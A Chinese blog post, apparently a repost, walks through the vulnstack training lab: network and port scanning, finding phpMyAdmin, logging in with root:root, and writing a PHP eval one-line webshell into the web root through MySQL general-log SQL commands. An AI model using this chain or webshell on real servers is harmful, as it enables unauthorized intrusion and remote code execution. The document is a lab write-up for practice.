自学内容网 自学内容网

【红日安全】vulnstack (一)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦


靶场搭建

靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
下载解压后在VM中打开

靶场渗透

明确目标

目标跟我们处于同一个网段

信息收集

先查一下我们自己的IP,用 ifconfig 查看攻击机的IP为192.168.64.131在这里插入图片描述

探测一下跟我们同一网段下的主机有哪些,用Kali自带的arp扫描器扫描同一网段下的主机,发现了同一网段下的不同IP192.168.64.134,判断它就是要渗透的主机。

arp-scan -l  扫描网段所有主机
arp-scan -I eth0 -l  扫描指定网段所有IP

在这里插入图片描述

扫到IP之后接下来扫描端口,发现它开启了803306端口

nmap -T4 -p- 192.168.64.134

在这里插入图片描述

访问一下80端口,发现是phpStudy探针界面,在其中发现了它的操作系统是Windows,服务器是Apache
在这里插入图片描述

dirsearch扫一下看看能发现什么,成功扫出来了phpmyadmin界面
在这里插入图片描述

访问一下看看,发现是一个登陆界面
在这里插入图片描述

用弱口令试试,刚开始试了admin:123456提示错误,又用root试了一下成功登录进去

账号:root
密码:root

在这里插入图片描述

phpadmin后台getshell

  1. 开启日志
set global general_log='on';

在这里插入图片描述

  1. 改变日志存储位置
set global general_log_file ="c:/phpStudy/www/she.php";

在这里插入图片描述

  1. 写入一句话木马
select '<?php @eval($_POST[cmd]);?>';

在这里插入图片描述

  1. 用蚁剑连接,成功getshell

在这里插入图片描述


原文地址:https://blog.csdn.net/m0_71944965/article/details/143042477

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!